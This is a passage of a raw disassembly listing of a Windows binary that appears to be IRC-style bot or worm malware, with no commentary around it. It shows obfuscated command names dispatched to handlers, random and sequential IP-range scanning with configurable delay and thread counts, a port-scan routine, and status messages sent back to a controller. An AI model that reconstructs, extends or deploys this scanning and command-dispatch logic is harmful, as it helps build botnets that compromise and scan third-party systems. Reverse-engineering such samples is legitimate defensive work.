push dword ptr [esi+0Ch]
jmp short loc_4107E9
; ---------------------------------------------------------------------------
loc_4107D1: ; CODE XREF: sub_40A9FE+5DB7�j
test ebx, ebx
jz short loc_4107DE
push ebx
call sub_42A100
pop ecx
jmp short loc_4107E0
; ---------------------------------------------------------------------------
loc_4107DE: ; CODE XREF: sub_40A9FE+5DD5�j
xor eax, eax
loc_4107E0: ; CODE XREF: sub_40A9FE+5DDE�j
push eax
push [ebp+arg_20]
push [ebp+arg_18]
push dword ptr [esi]
loc_4107E9: ; CODE XREF: sub_40A9FE+5DD1�j
push [ebp+arg_10]
call sub_401990
jmp loc_41479B
; ---------------------------------------------------------------------------
loc_4107F6: ; CODE XREF: sub_40A9FE+5DAF�j
push dword ptr [ebx]
push offset aTvjro1ubgtg1 ; "TVJrO1uBGtg1"
call edi ; dword_437178
test eax, eax
jnz short loc_410842
mov ebx, [ebx+4]
test ebx, ebx
jz short loc_410812
push ebx
call sub_42A100
jmp short loc_410819
; ---------------------------------------------------------------------------
loc_410812: ; CODE XREF: sub_40A9FE+5E0A�j
push 8
call sub_42381F
loc_410819: ; CODE XREF: sub_40A9FE+5E12�j
test eax, eax
pop ecx
jz loc_414995
cmp [ebp+arg_18], 0
push eax
jnz short loc_410830
push 0
push dword ptr [esi+0Ch]
jmp short loc_410835
; ---------------------------------------------------------------------------
loc_410830: ; CODE XREF: sub_40A9FE+5E29�j
push [ebp+arg_18]
push dword ptr [esi]
loc_410835: ; CODE XREF: sub_40A9FE+5E30�j
push [ebp+arg_10]
call sub_40204B
jmp loc_41474E
; ---------------------------------------------------------------------------
loc_410842: ; CODE XREF: sub_40A9FE+5E03�j
push dword ptr [ebx]
push offset aVxa_uCdd7s0 ; "VXA.u/cDD7S0"
call edi ; dword_437178
test eax, eax
jnz short loc_41085B
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push 8
jmp loc_412B29
; ---------------------------------------------------------------------------
loc_41085B: ; CODE XREF: sub_40A9FE+5E4F�j
push dword ptr [ebx]
push offset aH1cmq0wqw5c_ ; "h1cMQ0wQw5C."
call edi ; dword_437178
test eax, eax
jnz loc_410E28
cmp [ebx+4], eax
jz loc_414756
cmp [ebx+8], eax
jz loc_414756
cmp [ebx+0Ch], eax
jz loc_414756
cmp [ebx+10h], eax
jz loc_414756
push 8
call sub_423800
push dword ptr [ebx+8]
mov [ebp+arg_C], eax
call sub_42A100
add eax, [ebp+arg_C]
pop ecx
pop ecx
cmp eax, 1C2h
jg loc_413EDD
push dword ptr [ebx+4]
call sub_42A100
movzx eax, ax
mov [ebp+var_244], eax
push dword ptr [ebx+8]
call sub_42A100
mov [ebp+var_22C], eax
push dword ptr [ebx+0Ch]
call sub_42A100
add esp, 0Ch
cmp eax, 1
mov [ebp+var_240], eax
jnb short loc_4108F0
xor eax, eax
inc eax
mov [ebp+var_240], eax
loc_4108F0: ; CODE XREF: sub_40A9FE+5EE7�j
push 3
pop ecx
cmp eax, ecx
jbe short loc_4108FD
mov [ebp+var_240], ecx
loc_4108FD: ; CODE XREF: sub_40A9FE+5EF7�j
push dword ptr [ebx+10h]
call sub_42A100
mov [ebp+var_23C], eax
mov eax, 270Fh
cmp [ebp+var_23C], eax
pop ecx
jbe short loc_41091F
mov [ebp+var_23C], eax
loc_41091F: ; CODE XREF: sub_40A9FE+5F19�j
mov eax, [ebp+arg_14]
or [ebp+var_228], 0FFFFFFFFh
mov dword_454A48, eax
mov eax, [ebp+arg_20]
mov dword_454A4C, eax
mov eax, [ebp+arg_18]
xor ecx, ecx
mov dword_454A50, eax
cmp dword_43A378, ecx
mov [ebp+arg_C], ecx
jz short loc_41098F
mov [ebp+arg_4], offset dword_43A378
loc_410952: ; CODE XREF: sub_40A9FE+5F71�j
mov eax, [ebp+arg_4]
push dword ptr [ebx+4]
add eax, 0FFFFFFD0h
push eax
call edi ; dword_437178
test eax, eax
jz short loc_410973
add [ebp+arg_4], 40h
inc [ebp+arg_C]
mov eax, [ebp+arg_4]
cmp dword ptr [eax], 0
jnz short loc_410952
jmp short loc_41098D
; ---------------------------------------------------------------------------
loc_410973: ; CODE XREF: sub_40A9FE+5F62�j
mov eax, [ebp+arg_C]
mov ecx, eax
mov [ebp+var_228], eax
shl ecx, 6
mov ecx, dword_43A378[ecx]
mov [ebp+var_244], ecx
loc_41098D: ; CODE XREF: sub_40A9FE+5F73�j
xor ecx, ecx
loc_41098F: ; CODE XREF: sub_40A9FE+5F4B�j
cmp [ebp+var_244], ecx
jnz short loc_4109C8
cmp [ebp+arg_14], ecx
mov edi, offset aSInvalidPort ; "%s Invalid port"
jnz short loc_4109C0
cmp [ebp+arg_18], ecx
jnz loc_41473E
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 10h
xor ecx, ecx
loc_4109C0: ; CODE XREF: sub_40A9FE+5FA1�j
cmp [ebp+arg_18], ecx
jmp loc_414738
; ---------------------------------------------------------------------------
loc_4109C8: ; CODE XREF: sub_40A9FE+5F97�j
mov eax, [ebx+14h]
cmp eax, ecx
jz loc_410A56
push eax
push offset aX_x_x_x ; "x.x.x.x"
call edi ; dword_437178
test eax, eax
jnz short loc_410A27
call dword_437188 ; GetTickCount
push eax
call sub_429B8F
pop ecx
loc_4109EC: ; CODE XREF: sub_40A9FE+6001�j
call sub_429B9C
cdq
mov ecx, 0E1h
idiv ecx
add edx, 4
cmp edx, 7Fh
jz short loc_4109EC
push edx
push offset aD_x_x_x ; "%d.x.x.x"
lea eax, [ebp+var_2D4]
push 10h
push eax
call sub_429BBE
add esp, 10h
loc_410A18: ; CODE XREF: sub_40A9FE+6216�j
; sub_40A9FE+621E�j ...
mov [ebp+var_218], 1
jmp loc_410C49
; ---------------------------------------------------------------------------
loc_410A27: ; CODE XREF: sub_40A9FE+5FDF�j
push dword ptr [ebx+14h]
lea eax, [ebp+var_2D4]
push 10h
push eax
call sub_429BBE
push 78h
push dword ptr [ebx+14h]
call sub_42B1A0
add esp, 14h
neg eax
sbb eax, eax
neg eax
mov [ebp+var_218], eax
jmp loc_410C49
; ---------------------------------------------------------------------------
loc_410A56: ; CODE XREF: sub_40A9FE+5FCF�j
cmp [ebp+arg_64], ecx
jnz short loc_410AB1
cmp [ebp+arg_54], ecx
jnz loc_410B82
cmp [ebp+arg_58], ecx
jnz loc_410B82
cmp [ebp+arg_5C], ecx
jnz loc_410B82
cmp [ebp+arg_60], ecx
jnz loc_410B82
cmp [ebp+arg_14], ecx
mov ebx, offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
mov edi, offset aSNoIpSpecified ; "%s No IP specified."
jnz short loc_410AA9
cmp [ebp+arg_18], ecx
jnz loc_40B666
push ebx
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 10h
xor ecx, ecx
loc_410AA9: ; CODE XREF: sub_40A9FE+608E�j
cmp [ebp+arg_18], ecx
jmp loc_40B660
; ---------------------------------------------------------------------------
loc_410AB1: ; CODE XREF: sub_40A9FE+605B�j
cmp [ebp+arg_54], ecx
jz short loc_410ABF
mov [ebp+arg_C], 1
jmp short loc_410AD9
; ---------------------------------------------------------------------------
loc_410ABF: ; CODE XREF: sub_40A9FE+60B6�j
cmp [ebp+arg_58], ecx
jz short loc_410ACD
mov [ebp+arg_C], 2
jmp short loc_410AD9
; ---------------------------------------------------------------------------
loc_410ACD: ; CODE XREF: sub_40A9FE+60C4�j
cmp [ebp+arg_5C], ecx
jz short loc_410B50
mov [ebp+arg_C], 3
loc_410AD9: ; CODE XREF: sub_40A9FE+60BF�j
; sub_40A9FE+60CD�j
mov ebx, offset dword_457C40
push offset byte_454A54
push ebx
call edi ; dword_437178
test eax, eax
jz short loc_410AF5
push ebx
call sub_41E4C1
test eax, eax
pop ecx
jz short loc_410B1B
loc_410AF5: ; CODE XREF: sub_40A9FE+60EA�j
mov ecx, [ebp+arg_10]
call sub_41DB58
mov ecx, [ebp+arg_10]
push eax
call sub_41CF25
mov edi, eax
push 2710h
push edi
call dword_43707C ; WaitForSingleObject
push edi
call dword_437044 ; CloseHandle
loc_410B1B: ; CODE XREF: sub_40A9FE+60F5�j
push [ebp+arg_C]
mov edi, [ebp+arg_60]
push edi
push ebx
call sub_401F54
add esp, 0Ch
test eax, eax
jz loc_414995
push 10h
push eax
lea eax, [ebp+var_2D4]
push eax
call sub_429D10
add esp, 0Ch
mov [ebp+var_218], edi
jmp loc_410C49
; ---------------------------------------------------------------------------
loc_410B50: ; CODE XREF: sub_40A9FE+60D2�j
mov edi, offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
mov ebx, offset aSNoSubnetClass ; "%s No subnet class specified."
loc_410B5A: ; CODE XREF: sub_40A9FE+36ED�j
cmp [ebp+arg_14], ecx
jnz short loc_410B7A
cmp [ebp+arg_18], ecx
jnz loc_40D2C7
push edi
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 10h
xor ecx, ecx
loc_410B7A: ; CODE XREF: sub_40A9FE+615F�j
cmp [ebp+arg_18], ecx
jmp loc_40D2C1
; ---------------------------------------------------------------------------
loc_410B82: ; CODE XREF: sub_40A9FE+6060�j
; sub_40A9FE+6069�j ...
mov ecx, [ebp+arg_10]
push 10h
pop edi
lea eax, [ebp+var_5C]
push eax
lea eax, [ebp+var_6C]
push eax
mov [ebp+var_5C], edi
call sub_41DB68
push eax
call dword_456EB8 ; getsockname
xor ebx, ebx
cmp [ebp+arg_54], ebx
jz short loc_410BAF
and [ebp+var_68], 0FFh
jmp short loc_410BC4
; ---------------------------------------------------------------------------
loc_410BAF: ; CODE XREF: sub_40A9FE+61A6�j
cmp [ebp+arg_58], ebx
jz short loc_410BBB
and word ptr [ebp+var_68+2], 0
jmp short loc_410BC4
; ---------------------------------------------------------------------------
loc_410BBB: ; CODE XREF: sub_40A9FE+61B4�j
cmp [ebp+arg_5C], ebx
jz short loc_410BC4
and byte ptr [ebp+var_68+3], 0
loc_410BC4: ; CODE XREF: sub_40A9FE+61AF�j
; sub_40A9FE+61BB�j ...
push edi
push [ebp+var_68]
call dword_456FDC ; inet_ntoa
push eax
lea eax, [ebp+var_2D4]
push eax
call sub_429D10
add esp, 0Ch
cmp [ebp+arg_60], ebx
jz short loc_410C43
xor edi, edi
cmp [ebp+arg_54], ebx
jz short loc_410BEF
push 3
loc_410BEC: ; CODE XREF: sub_40A9FE+61F8�j
pop edi
jmp short loc_410C00
; ---------------------------------------------------------------------------
loc_410BEF: ; CODE XREF: sub_40A9FE+61EA�j
cmp [ebp+arg_58], ebx
jz short loc_410BF8
push 2
jmp short loc_410BEC
; ---------------------------------------------------------------------------
loc_410BF8: ; CODE XREF: sub_40A9FE+61F4�j
cmp [ebp+arg_5C], ebx
jz short loc_410C00
xor edi, edi
inc edi
loc_410C00: ; CODE XREF: sub_40A9FE+61EF�j
; sub_40A9FE+61FD�j
lea eax, [ebp+var_2D4]
push 30h
push eax
call sub_42B060
pop ecx
xor bl, bl
test edi, edi
pop ecx
jle loc_410A18
loc_410C1A: ; CODE XREF: sub_40A9FE+623E�j
test eax, eax
jz loc_410A18
mov byte ptr [eax], 78h
lea eax, [ebp+var_2D4]
push 30h
push eax
call sub_42B060
pop ecx
inc bl
pop ecx
movsx ecx, bl
cmp ecx, edi
jl short loc_410C1A
jmp loc_410A18
; ---------------------------------------------------------------------------
loc_410C43: ; CODE XREF: sub_40A9FE+61E3�j
mov [ebp+var_218], ebx
loc_410C49: ; CODE XREF: sub_40A9FE+6024�j
; sub_40A9FE+6053�j ...
mov eax, [ebp+arg_14]
mov ecx, [ebp+arg_10]
mov [ebp+var_224], eax
mov eax, [ebp+arg_20]
mov [ebp+var_21C], eax
mov eax, [ebp+arg_18]
mov [ebp+var_220], eax
mov [ebp+var_20C], ecx
test eax, eax
lea eax, [ebp+var_2C4]
jz short loc_410C7E
push offset dword_443F14
jmp short loc_410C83
; ---------------------------------------------------------------------------
loc_410C7E: ; CODE XREF: sub_40A9FE+6277�j
push offset dword_443F1C
loc_410C83: ; CODE XREF: sub_40A9FE+627E�j
push eax
call dword_4370B4 ; lstrcpyA
cmp [ebp+var_218], 0
mov eax, offset aRandom ; "Random"
jnz short loc_410C9D
mov eax, offset aSequential ; "Sequential"
loc_410C9D: ; CODE XREF: sub_40A9FE+6298�j
push [ebp+var_22C]
lea ecx, [ebp+var_2D4]
mov edi, offset aSSSSDWithADela ; "%s %s %s %s:%d with a delay of %d secon"...
push [ebp+var_23C]
push [ebp+var_240]
push [ebp+var_244]
push ecx
push offset aY2lm40nv3yaP4m ; "Y2LM40Nv3Ya/p4MrM1AZiAp1eUok8/eobtx1"
push eax
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push edi
push 8
call sub_4234A7
add esp, 28h
mov [ebp+var_238], eax
lea eax, [ebp+arg_0]
xor ebx, ebx
push eax
lea eax, [ebp+var_2D4]
push ebx
push eax
push offset sub_402459
push ebx
push ebx
call dword_437180 ; CreateThread
mov ecx, [ebp+var_238]
imul ecx, 2724h
cmp eax, ebx
mov dword_46D72C[ecx], eax
jnz short loc_410D65
loc_410D0E: ; CODE XREF: sub_40A9FE+667B�j
cmp [ebp+arg_14], 0
mov ebx, dword_437170
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_410D41
cmp [ebp+arg_18], 0
jnz short loc_410D4B
call ebx ; dword_437170
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_410D41: ; CODE XREF: sub_40A9FE+631F�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_410D4B: ; CODE XREF: sub_40A9FE+6325�j
call ebx ; dword_437170
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
loc_410D53: ; CODE XREF: sub_40A9FE+6529�j
; sub_40A9FE+951D�j
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
jmp loc_41491C
; ---------------------------------------------------------------------------
loc_410D5D: ; CODE XREF: sub_40A9FE+636D�j
push 32h
call dword_437190 ; Sleep
loc_410D65: ; CODE XREF: sub_40A9FE+630E�j
cmp [ebp+var_214], ebx
jz short loc_410D5D
cmp [ebp+arg_14], ebx
jnz short loc_410DCE
cmp [ebp+arg_18], ebx
jnz short loc_410DD9
cmp [ebp+arg_1C], ebx
jnz loc_414995
cmp [ebp+var_218], 0
mov eax, offset aRandom ; "Random"
jnz short loc_410D93
mov eax, offset aSequential ; "Sequential"
loc_410D93: ; CODE XREF: sub_40A9FE+638E�j
push [ebp+var_22C]
lea ecx, [ebp+var_2D4]
push [ebp+var_23C]
push [ebp+var_240]
push [ebp+var_244]
push ecx
push offset aY2lm40nv3yaP4m ; "Y2LM40Nv3Ya/p4MrM1AZiAp1eUok8/eobtx1"
push eax
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 2Ch
xor ebx, ebx
loc_410DCE: ; CODE XREF: sub_40A9FE+6372�j
cmp [ebp+arg_18], ebx
jz loc_414995
xor ebx, ebx
loc_410DD9: ; CODE XREF: sub_40A9FE+6377�j
cmp [ebp+var_218], ebx
mov eax, offset aRandom ; "Random"
jnz short loc_410DEB
mov eax, offset aSequential ; "Sequential"
loc_410DEB: ; CODE XREF: sub_40A9FE+63E6�j
push [ebp+var_22C]
lea ecx, [ebp+var_2D4]
push [ebp+var_23C]
push [ebp+var_240]
push [ebp+var_244]
push ecx
push offset aY2lm40nv3yaP4m ; "Y2LM40Nv3Ya/p4MrM1AZiAp1eUok8/eobtx1"
push eax
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push edi
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CDD4
add esp, 2Ch
jmp loc_414995
; ---------------------------------------------------------------------------
loc_410E28: ; CODE XREF: sub_40A9FE+5E68�j
push dword ptr [ebx]
push offset aSxytb1_eejq_ ; "SXYtb1.EEjQ."
call edi ; dword_437178
test eax, eax
jz loc_413EA2
push dword ptr [ebx]
push offset aVb1r0N_arr0 ; "vB1r0/N.Arr0"
call edi ; dword_437178
test eax, eax
jz loc_413EA2
push dword ptr [ebx]
push offset a8im6i__c829_ ; "8Im6i..C829."
call edi ; dword_437178
test eax, eax
jz loc_413EA2
push dword ptr [ebx]
push offset aTiyj208fhvn_ ; "tIYj208FHvN."
call edi ; dword_437178
test eax, eax
jz loc_413EA2
push dword ptr [ebx]
push offset a5ngN0zjh2i1 ; "5nG/N0ZJh2i1"
call edi ; dword_437178
test eax, eax
jz loc_413EA2
push dword ptr [ebx]
push offset aMdf9n0kzpx60 ; "mdf9n0kzPX60"
call edi ; dword_437178
test eax, eax
jz loc_413EA2
push dword ptr [ebx]
push offset aAtfv_jgk0x1 ; "/ATfv.jgK0X1"
call edi ; dword_437178
test eax, eax
jz loc_413EA2
push dword ptr [ebx]
push offset aFu6k10irsc1 ; "fu6k10iRsc/1"
call edi ; dword_437178
test eax, eax
jz loc_413EA2
push dword ptr [ebx]
push offset a_luua_bruje0 ; ".lUua.bruje0"
call edi ; dword_437178
test eax, eax
jnz loc_4110A1
xor edi, edi
cmp [ebx+4], edi
jz loc_411097
cmp [ebx+8], edi
jz loc_411097
cmp [ebx+0Ch], edi
jz loc_411097
push 9
call sub_42381F
cmp eax, edi
pop ecx
mov [ebp+arg_C], eax
jle short loc_410F2C
cmp [ebp+arg_14], 0
mov ebx, offset aJqrlpUxr08Qqdu ; "JQrlp/UXr08/qqduw/ZeDHN/N/Wda.tYScO0znN"...
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_410F19
cmp [ebp+arg_18], 0
jnz short loc_410F23
push eax
push ebx
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_410F19: ; CODE XREF: sub_40A9FE+64FD�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_410F23: ; CODE XREF: sub_40A9FE+6503�j
push [ebp+arg_C]
push ebx
jmp loc_410D53
; ---------------------------------------------------------------------------
loc_410F2C: ; CODE XREF: sub_40A9FE+64ED�j
mov eax, [ebp+arg_20]
mov ecx, [ebp+arg_14]
mov dword_454A4C, eax
mov eax, [ebp+arg_18]
mov dword_454A50, eax
mov [ebp+var_840], eax
cmp eax, edi
mov dword_454A48, ecx
mov [ebp+var_838], ecx
lea eax, [ebp+var_95C]
jnz short loc_410F62
push offset dword_443F1C
jmp short loc_410F64
; ---------------------------------------------------------------------------
loc_410F62: ; CODE XREF: sub_40A9FE+655B�j
push dword ptr [esi]
loc_410F64: ; CODE XREF: sub_40A9FE+6562�j
push eax
call dword_4370B4 ; lstrcpyA
mov eax, [ebp+arg_10]
mov [ebp+var_964], eax
push dword ptr [ebx+4]
call dword_456F7C ; inet_addr
mov [ebp+var_848], eax
push dword ptr [ebx+8]
call sub_42A100
mov [ebp+var_85C], eax
mov ebx, [ebx+0Ch]
cmp ebx, edi
pop ecx
jnz short loc_410FA5
mov [ebp+var_858], 64h
jmp short loc_410FB2
; ---------------------------------------------------------------------------
loc_410FA5: ; CODE XREF: sub_40A9FE+6599�j
push ebx
call sub_42A100
pop ecx
mov [ebp+var_858], eax
loc_410FB2: ; CODE XREF: sub_40A9FE+65A5�j
cmp [ebp+arg_14], 0
mov ebx, offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
mov edi, offset aSPortPscanStar ; "%s Port pscan started: %s:%d with delay"...
jnz short loc_410FF1
cmp [ebp+arg_18], 0
jnz short loc_410FF7
push [ebp+var_858]
push [ebp+var_85C]
push [ebp+var_848]
call dword_456FDC ; inet_ntoa
push eax
push ebx
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 1Ch
loc_410FF1: ; CODE XREF: sub_40A9FE+65C2�j
cmp [ebp+arg_18], 0
jz short loc_41101F
loc_410FF7: ; CODE XREF: sub_40A9FE+65C8�j
push [ebp+var_858]
push [ebp+var_85C]
push [ebp+var_848]
call dword_456FDC ; inet_ntoa
push eax
push ebx
push edi
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CDD4
add esp, 1Ch
loc_41101F: ; CODE XREF: sub_40A9FE+65F7�j
push [ebp+var_858]
push [ebp+var_85C]
push [ebp+var_848]
call dword_456FDC ; inet_ntoa
push eax
push ebx
push edi
push 9
call sub_4234A7
add esp, 18h
mov [ebp+var_850], eax
lea eax, [ebp+arg_0]
xor edi, edi
push eax
lea eax, [ebp+var_964]
push edi
push eax
push offset sub_407281
push edi
push edi
call dword_437180 ; CreateThread
mov ecx, [ebp+var_850]
imul ecx, 2724h
cmp eax, edi
mov dword_46D72C[ecx], eax
jz loc_410D0E
jmp short loc_411089
; ---------------------------------------------------------------------------
loc_411081: ; CODE XREF: sub_40A9FE+6692�j
push 32h
call dword_437190 ; Sleep
loc_411089: ; CODE XREF: sub_40A9FE+6681�j
cmp [ebp+var_834], 0
jz short loc_411081
jmp loc_414995
; ---------------------------------------------------------------------------
loc_411097: ; CODE XREF: sub_40A9FE+64C8�j
; sub_40A9FE+64D1�j ...
mov edi, offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
jmp loc_40BF10
; ---------------------------------------------------------------------------
loc_4110A1: ; CODE XREF: sub_40A9FE+64BD�j
push dword ptr [ebx]
push offset aKzqshDhric_ ; "kzqSH/dhRIc."
call edi ; dword_437178
test eax, eax
jnz short loc_4110BA
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push 9
jmp loc_412B29
; ---------------------------------------------------------------------------
loc_4110BA: ; CODE XREF: sub_40A9FE+66AE�j
push dword ptr [ebx]
push offset aUycsBekwp0 ; "/uYcs/BEKWP0"
call edi ; dword_437178
test eax, eax
jnz loc_4111E6
push 0Ah
call sub_42381F
test eax, eax
pop ecx
mov [ebp+arg_C], eax
jle short loc_4110E4
mov ebx, offset aXlpyr1anpgm0 ; "xLpyR1aNPGm0"
jmp loc_40B964
; ---------------------------------------------------------------------------
loc_4110E4: ; CODE XREF: sub_40A9FE+66DA�j
mov eax, [ebp+arg_14]
and dword_456594, 0
mov dword_45658C, eax
mov eax, [ebp+arg_20]
mov edi, offset aIhfnL6b5x ; "/iHFN/l6B5X/"
mov ebx, offset aSS_ ; "%s %s."
push edi
mov dword_456588, eax
mov eax, [ebp+arg_10]
push offset aXlpyr1anpgm0 ; "xLpyR1aNPGm0"
push ebx
push 0Ah
mov dword_4564D8, eax
call sub_4234A7
add esp, 10h
mov dword_45655C, eax
lea eax, [ebp+arg_0]
push eax
xor eax, eax
push eax
push offset dword_4564D8
push offset sub_407E4B
push eax
push eax
call dword_437180 ; CreateThread
mov ecx, dword_45655C
imul ecx, 2724h
test eax, eax
mov dword_46D72C[ecx], eax
jnz short loc_4111A7
cmp [ebp+arg_14], eax
mov ebx, dword_437170
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_411183
cmp [ebp+arg_18], eax
jnz short loc_41118D
call ebx ; dword_437170
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset aXlpyr1anpgm0 ; "xLpyR1aNPGm0"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_411183: ; CODE XREF: sub_40A9FE+6762�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_41118D: ; CODE XREF: sub_40A9FE+6767�j
call ebx ; dword_437170
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset aXlpyr1anpgm0 ; "xLpyR1aNPGm0"
jmp loc_41491C
; ---------------------------------------------------------------------------
loc_41119F: ; CODE XREF: sub_40A9FE+67B0�j
push 32h
call dword_437190 ; Sleep
loc_4111A7: ; CODE XREF: sub_40A9FE+6752�j
cmp dword_456594, 0
jz short loc_41119F
cmp [ebp+arg_14], 0
jnz short loc_4111D1
cmp [ebp+arg_18], 0
jnz short loc_4111DB
push edi
push offset aXlpyr1anpgm0 ; "xLpyR1aNPGm0"
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 14h
loc_4111D1: ; CODE XREF: sub_40A9FE+67B6�j
cmp [ebp+arg_18], 0
jz loc_414995
loc_4111DB: ; CODE XREF: sub_40A9FE+67BC�j
push edi
push offset aXlpyr1anpgm0 ; "xLpyR1aNPGm0"
jmp loc_40B0FB
; ---------------------------------------------------------------------------
loc_4111E6: ; CODE XREF: sub_40A9FE+66C7�j
push dword ptr [ebx]
push offset aWwfbf_0ptze_ ; "WWFBf.0ptzE."
call edi ; dword_437178
test eax, eax
jnz short loc_4111FF
push offset aXlpyr1anpgm0 ; "xLpyR1aNPGm0"
push 0Ah
jmp loc_412B29
; ---------------------------------------------------------------------------
loc_4111FF: ; CODE XREF: sub_40A9FE+67F3�j
push dword ptr [ebx]
push offset aFhzdv1ootfg0 ; "fhzdV1OotFg0"
call edi ; dword_437178
test eax, eax
jnz loc_411355
push 0Bh
call sub_42381F
test eax, eax
pop ecx
mov [ebp+arg_C], eax
jle short loc_411229
mov ebx, offset aWpukb_0uioaOfu ; "WPUkb.0uIoa/OFUur11TNYw0"
jmp loc_40B964
; ---------------------------------------------------------------------------
loc_411229: ; CODE XREF: sub_40A9FE+681F�j
mov eax, [ebp+arg_10]
mov [ebp+var_1A2C], eax
mov eax, [ebp+arg_14]
mov [ebp+var_1978], eax
mov eax, [ebp+arg_20]
mov [ebp+var_197C], eax
push dword ptr [esi+0Ch]
lea eax, [ebp+var_1A28]
push eax
call sub_42A5D0
mov edi, offset aIhfnL6b5x ; "/iHFN/l6B5X/"
mov ebx, offset aSS_ ; "%s %s."
push edi
push offset aWpukb_0uioaOfu ; "WPUkb.0uIoa/OFUur11TNYw0"
push ebx
push 0Bh
call sub_4234A7
add esp, 18h
mov [ebp+var_19A8], eax
lea eax, [ebp+arg_0]
lea ecx, [ebp+var_1A2C]
push eax
xor eax, eax
push eax
push ecx
push offset loc_40A1EF
push eax
push eax
call dword_437180 ; CreateThread
mov ecx, [ebp+var_19A8]
imul ecx, 2724h
test eax, eax
mov dword_46D72C[ecx], eax
jnz short loc_411308
cmp [ebp+arg_14], eax
mov ebx, dword_437170
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_4112D6
cmp [ebp+arg_18], eax
jnz short loc_4112E0
call ebx ; dword_437170
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset aWpukb_0uioaOfu ; "WPUkb.0uIoa/OFUur11TNYw0"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 18h
loc_4112D6: ; CODE XREF: sub_40A9FE+68B5�j
cmp [ebp+arg_18], 0
jz loc_412FED
loc_4112E0: ; CODE XREF: sub_40A9FE+68BA�j
call ebx ; dword_437170
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset aWpukb_0uioaOfu ; "WPUkb.0uIoa/OFUur11TNYw0"
push edi
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CDD4
jmp loc_40FCD9
; ---------------------------------------------------------------------------
loc_4112FD: ; CODE XREF: sub_40A9FE+6911�j
push 1F4h
call dword_437190 ; Sleep
loc_411308: ; CODE XREF: sub_40A9FE+68A5�j
cmp [ebp+var_1970], 0
jz short loc_4112FD
cmp [ebp+arg_14], 0
jnz short loc_411332
cmp [ebp+arg_18], 0
jnz short loc_41133C
push edi
push offset aWpukb_0uioaOfu ; "WPUkb.0uIoa/OFUur11TNYw0"
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CE4A
add esp, 14h
loc_411332: ; CODE XREF: sub_40A9FE+6917�j
cmp [ebp+arg_18], 0
jz loc_412FED
loc_41133C: ; CODE XREF: sub_40A9FE+691D�j
push edi
push offset aWpukb_0uioaOfu ; "WPUkb.0uIoa/OFUur11TNYw0"
push ebx
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CDD4
add esp, 14h
jmp loc_412FED
; ---------------------------------------------------------------------------
loc_411355: ; CODE XREF: sub_40A9FE+680C�j
push dword ptr [ebx]
push offset aUmk7x0pwyw9Qrn ; "Umk7x0PwyW9/QRn4z10ge1I1"
call edi ; dword_437178
test eax, eax
jnz short loc_41136E
push offset aWpukb_0uioaOfu ; "WPUkb.0uIoa/OFUur11TNYw0"
push 0Bh
jmp loc_412B29
; ---------------------------------------------------------------------------
loc_41136E: ; CODE XREF: sub_40A9FE+6962�j
push dword ptr [ebx]
push offset a7fugu_n0u2m1 ; "7FUgU.N0U2m1"
call edi ; dword_437178
test eax, eax
jnz loc_41159E
xor edi, edi
cmp [ebx+4], edi
jz loc_411594
cmp [ebx+8], edi
jz loc_411594
cmp [ebx+0Ch], edi
jz loc_411594
cmp [ebx+10h], edi
jz loc_411594
push 0Dh
call sub_423800
cmp eax, 32h
pop ecx
mov [ebp+arg_C], eax
jle short loc_4113F9
cmp [ebp+arg_14], 0
mov ebx, offset aJqrlpUxr08Qqdu ; "JQrlp/UXr08/qqduw/ZeDHN/N/Wda.tYScO0znN"...
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_4113E1
